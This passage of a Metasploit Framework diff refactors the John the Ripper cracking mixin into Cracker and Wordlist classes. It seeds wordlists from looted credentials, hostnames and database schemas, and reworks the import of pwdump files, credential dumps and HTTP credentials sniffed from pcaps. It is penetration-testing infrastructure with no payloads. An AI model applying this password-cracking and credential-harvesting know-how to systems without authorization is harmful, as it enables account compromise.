+          modules_paths = engine.paths['modules']
+
+          if modules_paths
+            modules_directories = modules_paths.existent_directories
+
+            modules_directories.each do |modules_directory|
+              modules.add_module_path(modules_directory, options)
+            end
+          end
+        end
       end
     end
   end
diff --git a/lib/msf/core/auxiliary/jtr.rb b/lib/msf/core/auxiliary/jtr.rb
index db7af6a43f..b430f4b935 100644
--- a/lib/msf/core/auxiliary/jtr.rb
+++ b/lib/msf/core/auxiliary/jtr.rb
@@ -2,7 +2,8 @@
 require 'open3'
 require 'fileutils'
 require 'rex/proto/ntlm/crypt'
-
+require 'metasploit/framework/jtr/cracker'
+require 'metasploit/framework/jtr/wordlist'
 
 
 module Msf
@@ -24,243 +25,28 @@ module Auxiliary::JohnTheRipper
 
     register_options(
       [
-        OptPath.new('JOHN_BASE', [false, 'The directory containing John the Ripper (src, run, doc)']),
-        OptPath.new('JOHN_PATH', [false, 'The absolute path to the John the Ripper executable']),
-        OptPath.new('Wordlist', [false, 'The path to an optional Wordlist']),
-        OptBool.new('Munge',[false, 'Munge the Wordlist (Slower)', false])
+        OptPath.new('CONFIG',               [false, 'The path to a John config file to use instead of the default']),
+        OptPath.new('CUSTOM_WORDLIST',      [false, 'The path to an optional custom wordlist']),
+        OptInt.new('ITERATION_TIMOUT',      [false, 'The max-run-time for each iteration of cracking']),
+        OptPath.new('JOHN_PATH',            [false, 'The absolute path to the John the Ripper executable']),
+        OptBool.new('MUTATE',               [false, 'Apply common mutations to the Wordlist (SLOW)', false]),
+        OptPath.new('POT',                  [false, 'The path to a John POT file to use instead of the default']),
+        OptBool.new('USE_CREDS',            [false, 'Use existing credential data saved in the database', true]),
+        OptBool.new('USE_DB_INFO',          [false, 'Use looted database schema info to seed the wordlist', true]),
+        OptBool.new('USE_DEFAULT_WORDLIST', [false, 'Use the default metasploit wordlist', true]),
+        OptBool.new('USE_HOSTNAMES',        [false, 'Seed the wordlist with hostnames from the workspace', true]),
+        OptBool.new('USE_ROOT_WORDS',       [false, 'Use the Common Root Words Wordlist', true])
       ], Msf::Auxiliary::JohnTheRipper
     )
 
-    @run_path  = nil
-    @john_path = ::File.join(Msf::Config.data_directory, "john")
-
-    autodetect_platform
-  end
-
-  # @return [String] the run path instance variable if the platform is detectable, nil otherwise.
-  def autodetect_platform
-    return @run_path if @run_path
-    cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
-    if File.directory?(cpuinfo_base)
-      data = nil
-
-      case ::RUBY_PLATFORM
-      when /mingw|cygwin|mswin/
-        fname = "#{cpuinfo_base}/cpuinfo.exe"
-        if File.exists?(fname) and File.executable?(fname)
-          data = %x{"#{fname}"} rescue nil
-        end
-        case data
-        when /sse2/
-          @run_path ||= "run.win32.sse2/john.exe"
-        when /mmx/
-          @run_path ||= "run.win32.mmx/john.exe"
-        else
-          @run_path ||= "run.win32.any/john.exe"
-        end
-      when /x86_64-linux/
-        fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
-        if File.exists? fname
-          ::FileUtils.chmod(0755, fname) rescue nil
-          data = %x{"#{fname}"} rescue nil
-        end
-        case data
-        when /mmx/
-          @run_path ||= "run.linux.x64.mmx/john"
-        else
-          @run_path ||= "run.linux.x86.any/john"
-        end
-      when /i[\d]86-linux/
-        fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
-        if File.exists? fname
-          ::FileUtils.chmod(0755, fname) rescue nil
-          data = %x{"#{fname}"} rescue nil
-        end
-        case data
-        when /sse2/
-          @run_path ||= "run.linux.x86.sse2/john"
-        when /mmx/
-          @run_path ||= "run.linux.x86.mmx/john"
-        else
-          @run_path ||= "run.linux.x86.any/john"
-        end
-      end
-    end
-
-    return @run_path
-  end
-
-  def john_session_id
-    @session_id ||= ::Rex::Text.rand_text_alphanumeric(8)
-  end
-
-  def john_pot_file
-    ::File.join( ::Msf::Config.config_directory, "john.pot" )
-  end
-
-  def john_cracked_passwords
-    ret = {}
-    return ret if not ::File.exist?(john_pot_file)
-    ::File.open(john_pot_file, "rb") do |fd|
-      fd.each_line do |line|
-        hash,clear = line.sub(/\r?\n$/, '').split(",", 2)
-        ret[hash] = clear
-      end
-    end
-    ret
-  end
-
-  def john_show_passwords(hfile, format=nil)
-    res = {:cracked => 0, :uncracked => 0, :users => {} }
-
-    john_command = john_binary_path
-
-    if john_command.nil?
-      print_error("John the Ripper executable not found")
-      return res
-    end
-
-    pot  = john_pot_file
-    conf = ::File.join(john_base_path, "confs", "john.conf")
-
-    cmd = [ john_command,  "--show", "--conf=#{conf}", "--pot=#{pot}", hfile]
-
-    if format
-      cmd << "--format=" + format
-    end
-
-    if RUBY_VERSION =~ /^1\.8\./
-      cmd = cmd.join(" ")
-    end
-
-    ::IO.popen(cmd, "rb") do |fd|
-      fd.each_line do |line|
-        line.chomp!
-        print_status(line)
-        if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
-          res[:cracked]   = $1.to_i
-          res[:uncracked] = $2.to_i
-        end
-
-        # XXX: If the password had : characters in it, we're screwed
-
-        bits = line.split(':', -1)
-
-        # Skip blank passwords
-        next if not bits[2]
-
-        if (format== 'lm' or format == 'nt')
-          res[ :users ][ bits[0] ] = bits[1]
-        else
-          bits.last.chomp!
-          res[ :users ][ bits[0] ] = bits.drop(1)
-        end
-
-      end
-    end
-    res
-  end
-
-  def john_unshadow(passwd_file,shadow_file)
-
-    retval=""
-
-    john_command = john_binary_path
-
-    if john_command.nil?
-      print_error("John the Ripper executable not found")
-      return nil
-    end
-
-    if File.exists?(passwd_file)
-      unless File.readable?(passwd_file)
-        print_error("We do not have permission to read #{passwd_file}")
-        return nil
-      end
-    else
-      print_error("File does not exist: #{passwd_file}")
-      return nil
-    end
-
-    if File.exists?(shadow_file)
-      unless File.readable?(shadow_file)
-        print_error("We do not have permission to read #{shadow_file}")
-        return nil
-      end
-    else
-      print_error("File does not exist: #{shadow_file}")
-      return nil
-    end
-
-
-    cmd = [ john_command.gsub(/john$/, "unshadow"), passwd_file , shadow_file ]
-
-    if RUBY_VERSION =~ /^1\.8\./
-      cmd = cmd.join(" ")
-    end
-    ::IO.popen(cmd, "rb") do |fd|
-      fd.each_line do |line|
-        retval << line
-      end
-    end
-    return retval
-  end
-
-  def john_wordlist_path
-    # We ship it under wordlists/
-    path = ::File.join(john_base_path, "wordlists", "password.lst")
-    # magnumripper/JohnTheRipper repo keeps it under run/
-    unless ::File.file? path
-      path = ::File.join(john_base_path, "run", "password.lst")
-    end
-
-    path
-  end
-
-  def john_binary_path
-    path = nil
-    if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
-      path = datastore['JOHN_PATH']
-      ::FileUtils.chmod(0755, path) rescue nil
-      return path
-    end
-
-    if not @run_path
-      if ::RUBY_PLATFORM =~ /mingw|cygwin|mswin/
-        ::File.join(john_base_path, "john.exe")
-      else
-        path = ::File.join(john_base_path, "john")
-        ::FileUtils.chmod(0755, path) rescue nil
-      end
-    else
-      path = ::File.join(john_base_path, @run_path)
-      ::FileUtils.chmod(0755, path) rescue nil
-    end
-
-    if path and ::File.exists?(path)
-      return path
-    end
-
-    path = Rex::FileUtils.find_full_path("john") ||
-      Rex::FileUtils.find_full_path("john.exe")
-  end
-
-  def john_base_path
-    if datastore['JOHN_BASE'] and ::File.directory?(datastore['JOHN_BASE'])
-      return datastore['JOHN_BASE']
-    end
-    if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
-      return ::File.dirname( datastore['JOHN_PATH'] )
-    end
-    @john_path
-  end
-
-  def john_expand_word(str)
-    res = [str]
-    str.split(/\W+/) {|w| res << w }
-    res.uniq
   end
 
+  # @param pwd [String] Password recovered from cracking an LM hash
+  # @param hash [String] NTLM hash for this password
+  # @return [String] `pwd` converted to the correct case to match the
+  #   given NTLM hash
+  # @return [nil] if no case matches the NT hash. This can happen when
+  #   `pwd` came from a john run that only cracked half of the LM hash
   def john_lm_upper_to_ntlm(pwd, hash)
     pwd  = pwd.upcase
     hash = hash.upcase
@@ -273,179 +59,41 @@ module Auxiliary::JohnTheRipper
   end
 
 
-  def john_crack(hfile, opts={})
-
-    res = {:cracked => 0, :uncracked => 0, :users => {} }
-
-    john_command = john_binary_path
-
-    if john_command.nil?
-      print_error("John the Ripper executable not found")
-      return nil
-    end
-
-    # Don't bother making a log file, we'd just have to rm it when we're
-    # done anyway.
-    cmd = [ john_command,  "--session=" + john_session_id, "--nolog"]
-
-    if opts[:conf]
-      cmd << ( "--conf=" + opts[:conf] )
-    else
-      cmd << ( "--conf=" + ::File.join(john_base_path, "confs", "john.conf") )
-    end
-
-    if opts[:pot]
-      cmd << ( "--pot=" + opts[:pot] )
-    else
-      cmd << ( "--pot=" + john_pot_file )
-    end
-
-    if opts[:format]
-      cmd << ( "--format=" + opts[:format] )
-    end
-
-    if opts[:wordlist]
-      cmd << ( "--wordlist=" + opts[:wordlist] )
-    end
-
-    if opts[:incremental]
-      cmd << ( "--incremental=" + opts[:incremental] )
-    end
-
-    if opts[:single]
-      cmd << ( "--single=" + opts[:single] )
-    end
-
-    if opts[:rules]
-      cmd << ( "--rules=" + opts[:rules] )
-    end
-
-    cmd << hfile
-
-    if RUBY_VERSION =~ /^1\.8\./
-      cmd = cmd.join(" ")
-    end
-
-    ::IO.popen(cmd, "rb") do |fd|
-      fd.each_line do |line|
-        print_status("Output: #{line.strip}")
-      end
-    end
-
-    res
+  # This method creates a new {Metasploit::Framework::JtR::Cracker} and populates
+  # some of the attributes based on the module datastore options.
+  #
+  # @return [nilClass] if there is no active framework db connection
+  # @return [Metasploit::Framework::JtR::Cracker] if it successfully creates a JtR Cracker object
+  def new_john_cracker
+    return nil unless framework.db.active
+    Metasploit::Framework::JtR::Cracker.new(
+        config: datastore['CONFIG'],
+        john_path: datastore['JOHN_PATH'],
+        max_runtime: datastore['ITERATION_TIMEOUT'],
+        pot: datastore['POT'],
+        wordlist: datastore['CUSTOM_WORDLIST']
+    )
   end
 
-  def build_seed
-
-    seed = []
-    #Seed the wordlist with Database , Table, and Instance Names
-
-    count = 0
-    schemas = myworkspace.notes.where('ntype like ?', '%.schema%')
-    unless schemas.nil? or schemas.empty?
-      schemas.each do |anote|
-        seed << anote.data['DBName']
-        count += 1
-        anote.data['Tables'].each do |table|
-          seed << table['TableName']
-          count += 1
-          table['Columns'].each do |column|
-            seed << column['ColumnName']
-            count += 1
-          end
-        end
-      end
-    end
-    print_status "Seeding wordlist with DB schema info... #{count} words added"
-    count = 0
-
-    instances = myworkspace.notes.find(:all, :conditions => ['ntype=?', 'mssql.instancename'])
-    unless instances.nil? or instances.empty?
-      instances.each do |anote|
-        seed << anote.data['InstanceName']
-        count += 1
-      end
-    end
-    print_status "Seeding with MSSQL Instance Names....#{count} words added"
-    count = 0
-
-    # Seed the wordlist with usernames, passwords, and hostnames
-
-    myworkspace.hosts.find(:all).each do |o|
-      if o.name
-        seed << john_expand_word( o.name )
-        count += 1
-      end
-    end
-    print_status "Seeding with hostnames....#{count} words added"
-    count = 0
-
-
-    myworkspace.creds.each do |o|
-      if o.user
-        seed << john_expand_word( o.user )
-        count +=1
-      end
-      if (o.pass and o.ptype !~ /hash/)
-        seed << john_expand_word( o.pass )
-        count += 1
-      end
-    end
-    print_status "Seeding with found credentials....#{count} words added"
-    count = 0
-
-    # Grab any known passwords out of the john.pot file
-    john_cracked_passwords.values do |v|
-      seed << v
-      count += 1
-    end
-    print_status "Seeding with cracked passwords from John....#{count} words added"
-    count = 0
-
-    #Grab the default John Wordlist
-    john = File.open(john_wordlist_path, "rb")
-    john.each_line do |line|
-      seed << line.chomp
-      count += 1
-    end
-    print_status "Seeding with default John wordlist...#{count} words added"
-    count = 0
-
-    if datastore['Wordlist']
-      wordlist= File.open(datastore['Wordlist'], "rb")
-      wordlist.each_line do |line|
-        seed << line.chomp
-        count ==1
-      end
-      print_status "Seeding from user supplied wordlist...#{count} words added"
-    end
-
-
-
-    unless seed.empty?
-      seed.flatten!
-      seed.uniq!
-      if datastore['Munge']
-        mungedseed=[]
-        seed.each do |word|
-          munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
-          mungedseed << munged
-          munged.gsub!(/[eE]/, "3")
-          munged.gsub!(/[tT]/, "7")
-          mungedseed << munged
-        end
-        print_status "Adding #{mungedseed.count} words from munging..."
-        seed << mungedseed
-        seed.flatten!
-        seed.uniq!
-      end
-    end
-    print_status "De-duping the wordlist...."
-
-    print_status("Wordlist Seeded with #{seed.length} words")
-
-    return seed
-
+  # This method instantiates a {Metasploit::Framework::JtR::Wordlist}, writes the data
+  # out to a file and returns the {rex::quickfile} object.
+  #
+  # @return [nilClass] if there is no active framework db connection
+  # @return [Rex::Quickfile] if it successfully wrote the wordlist to a file
+  def wordlist_file
+    return nil unless framework.db.active
+    wordlist = Metasploit::Framework::JtR::Wordlist.new(
+        custom_wordlist: datastore['CUSTOM_WORDLIST'],
+        mutate: datastore['MUTATE'],
+        use_creds: datastore['USE_CREDS'],
+        use_db_info: datastore['USE_DB_INFO'],
+        use_default_wordlist: datastore['USE_DEFAULT_WORDLIST'],
+        use_hostnames: datastore['USE_HOSTNAMES'],
+        use_common_root: datastore['USE_ROOT_WORDS'],
+        workspace: myworkspace
+    )
+    wordlist.to_file
   end
+
 end
 end
diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb
index a20642ab91..6793162658 100644
--- a/lib/msf/core/auxiliary/login.rb
+++ b/lib/msf/core/auxiliary/login.rb
@@ -21,6 +21,10 @@ module Auxiliary::Login
   def initialize(info = {})
     super
 
+    create_login_ivars
+  end
+
+  def create_login_ivars
     # Appended to by each read and gets reset after each send.  Doing it
     # this way lets us deal with partial reads in the middle of expect
     # strings, e.g., the first recv returns "Pa" and the second returns
diff --git a/lib/msf/core/auxiliary/mixins.rb b/lib/msf/core/auxiliary/mixins.rb
index afa9ff5928..d71205e8e4 100644
--- a/lib/msf/core/auxiliary/mixins.rb
+++ b/lib/msf/core/auxiliary/mixins.rb
@@ -19,6 +19,5 @@ require 'msf/core/auxiliary/login'
 require 'msf/core/auxiliary/rservices'
 require 'msf/core/auxiliary/cisco'
 require 'msf/core/auxiliary/nmap'
-require 'msf/core/auxiliary/jtr'
 require 'msf/core/auxiliary/iax2'
 require 'msf/core/auxiliary/pii'
diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index 76ba80dd62..a7d10262a7 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -8,10 +8,13 @@ module Msf
 ###
 
 module Auxiliary::Report
+  extend Metasploit::Framework::Require
 
+  optionally_include_metasploit_credential_creation
 
-  def initialize(info = {})
-    super
+  # This method overrides the method from Metasploit::Credential to check for an active db
+  def active_db?
+    framework.db.active
   end
 
   # Shortcut method for detecting when the DB is active
@@ -23,6 +26,18 @@ module Auxiliary::Report
     @myworkspace = framework.db.find_workspace(self.workspace)
   end
 
+  # This method safely get the workspace ID. It handles if the db is not active
+  #
+  # @return [NilClass] if there is no DB connection
+  # @return [Fixnum] the ID of the current {Mdm::Workspace}
+  def myworkspace_id
+    if framework.db.active
+      myworkspace.id
+    else
+      nil
+    end
+  end
+
   def mytask
     if self[:task]
       return self[:task].record
@@ -387,6 +402,9 @@ module Auxiliary::Report
     print_status "Collecting #{cred_opts[:user]}:#{cred_opts[:pass]}"
     framework.db.report_auth_info(cred_opts)
   end
+
+
+
 end
 end
 
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 33db0e6a54..2896ef886d 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -7,7 +7,6 @@
 require 'csv'
 require 'tmpdir'
 require 'uri'
-require 'zip'
 
 #
 #
@@ -56,6 +55,7 @@ require 'rex/parser/retina_xml'
 # Project
 #
 
+require 'metasploit/framework/require'
 require 'msf/core/db_manager/import_msf_xml'
 
 module Msf
@@ -156,7 +156,10 @@ end
 #
 ###
 class DBManager
+  extend Metasploit::Framework::Require
+
   include Msf::DBManager::ImportMsfXml
+  optionally_include_metasploit_credential_creation
 
   def rfc3330_reserved(ip)
     case ip.class.to_s
@@ -1371,8 +1374,6 @@ class DBManager
 =end
     ntype  = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
     data   = opts[:data]
-    method = nil
-    args   = []
     note   = nil
 
     conditions = { :ntype => ntype }
@@ -1381,15 +1382,7 @@ class DBManager
 
     case mode
     when :unique
-      notes = wspace.notes.where(conditions)
-
-      # Only one note of this type should exist, make a new one if it
-      # isn't there. If it is, grab it and overwrite its data.
-      if notes.empty?
-        note = wspace.notes.new(conditions)
-      else
-        note = notes[0]
-      end
+      note      = wspace.notes.where(conditions).first_or_initialize
       note.data = data
     when :unique_data
       notes = wspace.notes.where(conditions)
@@ -2184,9 +2177,15 @@ class DBManager
   # @return [Integer] ID of created report
   def report_report(opts)
     return if not active
-  ::ActiveRecord::Base.connection_pool.with_connection {
+    created = opts.delete(:created_at)
+    updated = opts.delete(:updated_at)
+    state   = opts.delete(:state)
 
+  ::ActiveRecord::Base.connection_pool.with_connection {
     report = Report.new(opts)
+    report.created_at = created
+    report.updated_at = updated
+
     unless report.valid?
       errors = report.errors.full_messages.join('; ')
       raise RuntimeError "Report to be imported is not valid: #{errors}"
@@ -2201,10 +2200,14 @@ class DBManager
   # Creates a ReportArtifact based on passed parameters.
   # @param opts [Hash] of ReportArtifact attributes
   def report_artifact(opts)
+    return if not active
+
     artifacts_dir = Report::ARTIFACT_DIR
     tmp_path = opts[:file_path]
     artifact_name = File.basename tmp_path
     new_path = File.join(artifacts_dir, artifact_name)
+    created = opts.delete(:created_at)
+    updated = opts.delete(:updated_at)
 
     unless File.exists? tmp_path
       raise DBImportError 'Report artifact file to be imported does not exist.'
@@ -2222,6 +2225,9 @@ class DBManager
     FileUtils.copy(tmp_path, new_path)
     opts[:file_path] = new_path
     artifact = ReportArtifact.new(opts)
+    artifact.created_at = created
+    artifact.updated_at = updated
+
     unless artifact.valid?
       errors = artifact.errors.full_messages.join('; ')
       raise RuntimeError "Artifact to be imported is not valid: #{errors}"
@@ -2906,29 +2912,36 @@ class DBManager
 
     data = ""
     ::File.open(filename, 'rb') do |f|
-      data = f.read(4)
+      # This check is the largest (byte-wise) that we need to do
+      # since the other 4-byte checks will be subsets of this larger one.
+      data = f.read(Metasploit::Credential::Exporter::Pwdump::FILE_ID_STRING.size)
     end
     if data.nil?
       raise DBImportError.new("Zero-length file")
     end
 
-    case data[0,4]
-    when "PK\x03\x04"
-      data = Zip::ZipFile.open(filename)
-    when "\xd4\xc3\xb2\xa1", "\xa1\xb2\xc3\xd4"
-      data = PacketFu::PcapFile.new(:filename => filename)
+    if data.index(Metasploit::Credential::Exporter::Pwdump::FILE_ID_STRING)
+      data = ::File.open(filename, 'rb')
     else
-      ::File.open(filename, 'rb') do |f|
-        sz = f.stat.size
-        data = f.read(sz)
+      case data[0,4]
+      when "PK\x03\x04"
+        data = Zip::File.open(filename)
+      when "\xd4\xc3\xb2\xa1", "\xa1\xb2\xc3\xd4"
+        data = PacketFu::PcapFile.new(:filename => filename)
+      else
+        ::File.open(filename, 'rb') do |f|
+          sz = f.stat.size
+          data = f.read(sz)
+        end
       end
     end
+
+
     if block
       import(args.merge(:data => data)) { |type,data| yield type,data }
     else
       import(args.merge(:data => data))
     end
-
   end
 
   # A dispatcher method that figures out the data's file type,
@@ -2937,7 +2950,6 @@ class DBManager
   # is unknown.
   def import(args={}, &block)
     data = args[:data] || args['data']
-    wspace = args[:wspace] || args['wspace'] || workspace
     ftype = import_filetype_detect(data)
     yield(:filetype, @import_filedata[:type]) if block
     self.send "import_#{ftype}".to_sym, args, &block
@@ -2958,6 +2970,7 @@ class DBManager
   # :ip_list
   # :libpcap
   # :mbsa_xml
+  # :msf_cred_dump_zip
   # :msf_pwdump
   # :msf_xml
   # :msf_zip
@@ -2979,9 +2992,11 @@ class DBManager
   # :wapiti_xml
   #
   # If there is no match, an error is raised instead.
+  #
+  # @raise DBImportError if the type can't be detected
   def import_filetype_detect(data)
 
-    if data and data.kind_of? Zip::ZipFile
+    if data and data.kind_of? Zip::File
       if data.entries.empty?
         raise DBImportError.new("The zip file provided is empty.")
       end
@@ -2991,6 +3006,11 @@ class DBManager
       @import_filedata[:zip_basename] = @import_filedata[:zip_filename].gsub(/\.zip$/,"")
       @import_filedata[:zip_entry_names] = data.entries.map {|x| x.name}
 
+      if @import_filedata[:zip_entry_names].include?(Metasploit::Credential::Importer::Zip::MANIFEST_FILE_NAME)
+        @import_filedata[:type] = "Metasploit Credential Dump"
+        return :msf_cred_dump_zip
+      end
+
       xml_files = @import_filedata[:zip_entry_names].grep(/^(.*)\.xml$/)
 
       # TODO This check for our zip export should be more extensive
@@ -3014,6 +3034,12 @@ class DBManager
       return :libpcap
     end
 
+    # msfpwdump
+    if data.present? && data.kind_of?(::File)
+      @import_filedata[:type] = "Metasploit PWDump Export"
+      return :msf_pwdump
+    end
+
     # This is a text string, lets make sure its treated as binary
     data = data.unpack("C*").pack("C*")
     if data and data.to_s.strip.length == 0
@@ -3376,7 +3402,7 @@ class DBManager
         end
       end # tcp or udp
 
-      inspect_single_packet(pkt,wspace,args[:task])
+      inspect_single_packet(pkt,wspace,args)
 
     end # data.body.map
 
@@ -3389,16 +3415,17 @@ class DBManager
   # Do all the single packet analysis we can while churning through the pcap
   # the first time. Multiple packet inspection will come later, where we can
   # do stream analysis, compare requests and responses, etc.
-  def inspect_single_packet(pkt,wspace,task=nil)
+  def inspect_single_packet(pkt,wspace,args)
     if pkt.is_tcp? or pkt.is_udp?
-      inspect_single_packet_http(pkt,wspace,task)
+      inspect_single_packet_http(pkt,wspace,args)
     end
   end
 
   # Checks for packets that are headed towards port 80, are tcp, contain an HTTP/1.0
   # line, contains an Authorization line, contains a b64-encoded credential, and
   # extracts it. Reports this credential and solidifies the service as HTTP.
-  def inspect_single_packet_http(pkt,wspace,task=nil)
+  def inspect_single_packet_http(pkt,wspace,args)
+    task = args.fetch(:task, nil)
     # First, check the server side (data from port 80).
     if pkt.is_tcp? and pkt.tcp_src == 80 and !pkt.payload.nil? and !pkt.payload.empty?
       if pkt.payload =~ /^HTTP\x2f1\x2e[01]/n
@@ -3442,17 +3469,37 @@ class DBManager
             :name      => "http",
             :task      => task
         )
-        report_auth_info(
-            :workspace => wspace,
-            :host      => pkt.ip_daddr,
-            :port      => pkt.tcp_dst,
-            :proto     => "tcp",
-            :type      => "password",
-            :active    => true, # Once we can build a stream, determine if the auth was successful. For now, assume it is.
-            :user      => user,
-            :pass      => pass,
-            :task      => task
-        )
+
+        service_data = {
+            address: pkt.ip_daddr,
+            port: pkt.tcp_dst,
+            service_name: 'http',
+            protocol: 'tcp',
+            workspace_id: wspace.id
+        }
+        service_data[:task_id] = task.id if task
+
+        filename = args[:filename]
+
+        credential_data = {
+            origin_type: :import,
+            private_data: pass,
+            private_type: :password,
+            username: user,
+            filename: filename
+        }
+        credential_data.merge!(service_data)
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+
         # That's all we want to know from this service.
         return :something_significant
       end
@@ -3496,109 +3543,15 @@ class DBManager
     end
   end
 
-  #
-  # Metasploit PWDump Export
-  #
-  # This file format is generated by the db_export -f pwdump and
-  # the Metasploit Express and Pro report types of "PWDump."
-  #
-  # This particular block scheme is temporary, since someone is
-  # bound to want to import gigantic lists, so we'll want a
-  # stream parser eventually (just like the other non-nmap formats).
-  #
-  # The file format is:
-  # # 1.2.3.4:23/tcp (telnet)
-  # username password
-  # user2 p\x01a\x02ss2
-  # <BLANK> pass3
-  # user3 <BLANK>
-  # smbuser:sid:lmhash:nthash:::
-  #
-  # Note the leading hash for the host:port line. Note also all usernames
-  # and passwords must be in 7-bit ASCII (character sequences of "\x01"
-  # will be interpolated -- this includes spaces, which must be notated
-  # as "\x20". Blank usernames or passwords should be <BLANK>.
-  #
+
+  # Perform in an import of an msfpwdump file
   def import_msf_pwdump(args={}, &block)
-    data = args[:data]
-    wspace = args[:wspace] || workspace
-    bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
-    last_host = nil
-
-    addr  = nil
-    port  = nil
-    proto = nil
-    sname = nil
-    ptype = nil
-    active = false # Are there cases where imported creds are good? I just hate trusting the import right away.
-
-    data.each_line do |line|
-      case line
-      when /^[\s]*#/ # Comment lines
-        if line[/^#[\s]*([0-9.]+):([0-9]+)(\x2f(tcp|udp))?[\s]*(\x28([^\x29]*)\x29)?/n]
-          addr = $1
-          port = $2
-          proto = $4
-          sname = $6
-        end
-      when /^[\s]*Warning:/
-        # Discard warning messages.
-        next
-
-      # SMB Hash
-      when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/
-        user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
-        pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
-        ptype = "smb_hash"
-
-      # SMB Hash
-      when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/
-        user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
-        pass = ""
-        ptype = "smb_hash"
-
-      # SMB Hash with cracked plaintext, or just plain old plaintext
-      when /^[\s]*([^\s:]+):(.+):[A-Fa-f0-9]*:[A-Fa-f0-9]*:::$/
-        user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
-        pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
-        ptype = "password"
-
-      # Must be a user pass
-      when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n
-        user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
-        pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
-        ptype = "password"
-      else # Some unknown line not broken by a space.
-        next
-      end
-
-      next unless [addr,port,user,pass].compact.size == 4
-      next unless ipv46_validator(addr) # Skip Malformed addrs
-      next unless port[/^[0-9]+$/] # Skip malformed ports
-      if bl.include? addr
-        next
-      else
-        yield(:address,addr) if block and addr != last_host
-        last_host = addr
-      end
-
-      cred_info = {
-        :host      => addr,
-        :port      => port,
-        :user      => user,
-        :pass      => pass,
-        :type      => ptype,
-        :workspace => wspace,
-        :task      => args[:task]
-      }
-      cred_info[:proto] = proto if proto
-      cred_info[:sname] = sname if sname
-      cred_info[:active] = active
-
-      report_auth_info(cred_info)
-      user = pass = ptype = nil
-    end
-
+    filename = File.basename(args[:data].path)
+    wspace   = args[:wspace] || workspace
+    origin   = Metasploit::Credential::Origin::Import.create!(filename: filename)
+    importer = Metasploit::Credential::Importer::Pwdump.new(input: args[:data], workspace: wspace, filename: filename, origin:origin)
+    importer.import!
+    importer.input.close unless importer.input.closed?
   end
 
   # If hex notation is present, turn them into a character.
@@ -3649,7 +3602,7 @@ class DBManager
   # XXX: Refactor so it's not quite as sanity-blasting.
   def import_msf_zip(args={}, &block)
     data = args[:data]
-    wpsace = args[:wspace] || workspace
+    wspace = args[:wspace] || workspace
     bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
 
     new_tmp = ::File.join(Dir::tmpdir,"msf","imp_#{Rex::Text::rand_text_alphanumeric(4)}",@import_filedata[:zip_basename])
@@ -3680,9 +3633,10 @@ class DBManager
     }
 
     data.entries.each do |e|
-      target = ::File.join(@import_filedata[:zip_tmp],e.name)
+      target = ::File.join(@import_filedata[:zip_tmp], e.name)
       data.extract(e,target)
-      if target =~ /^.*.xml$/
+
+      if target =~ /\.xml\z/
         target_data = ::File.open(target, "rb") {|f| f.read 1024}
         if import_filetype_detect(target_data) == :msf_xml
           @import_filedata[:zip_extracted_xml] = target
@@ -3690,6 +3644,16 @@ class DBManager
       end
     end
 
+    # Import any creds if there are some in the import file
+    Dir.entries(@import_filedata[:zip_tmp]).each do |entry|
+      if entry =~ /^.*#{Regexp.quote(Metasploit::Credential::Exporter::Core::CREDS_DUMP_FILE_IDENTIFIER)}.*/
+        manifest_file_path = File.join(@import_filedata[:zip_tmp], entry, Metasploit::Credential::Importer::Zip::MANIFEST_FILE_NAME)
+        if File.exists? manifest_file_path
+          import_msf_cred_dump(manifest_file_path, wspace)
+        end
+      end
+    end
+
     # This will kick the newly-extracted XML file through
     # the import_file process all over again.
     if @import_filedata[:zip_extracted_xml]
@@ -3856,6 +3820,31 @@ class DBManager
     end
   end
 
+  # Import credentials given a path to a valid manifest file
+  #
+  # @param creds_dump_manifest_path [String]
+  # @param workspace [Mdm::Workspace] Default: {#workspace}
+  # @return [void]
+  def import_msf_cred_dump(creds_dump_manifest_path, workspace)
+    manifest_file = File.open(creds_dump_manifest_path)
+    origin = Metasploit::Credential::Origin::Import.create!(filename: File.basename(creds_dump_manifest_path))
+    importer = Metasploit::Credential::Importer::Core.new(workspace: workspace, input: manifest_file, origin: origin)
+    importer.import!
+  end
+
+  # Import credentials given a path to a valid manifest file
+  #
+  # @option args [String] :filename
+  # @option args [Mdm::Workspace] :wspace Default: {#workspace}
+  # @return [void]
+  def import_msf_cred_dump_zip(args = {})
+    wspace = args[:wspace] || workspace
+    origin = Metasploit::Credential::Origin::Import.create!(filename: File.basename(args[:filename]))
+    importer = Metasploit::Credential::Importer::Zip.new(workspace: wspace, input: File.open(args[:filename]), origin: origin)
+    importer.import!
+    nil
+  end
+
   # @param report [REXML::Element] to be imported
   # @param args [Hash]
   # @param base_dir [String]
diff --git a/lib/msf/core/db_export.rb b/lib/msf/core/db_export.rb
index 0a110f3006..45e7f48ff7 100644
--- a/lib/msf/core/db_export.rb
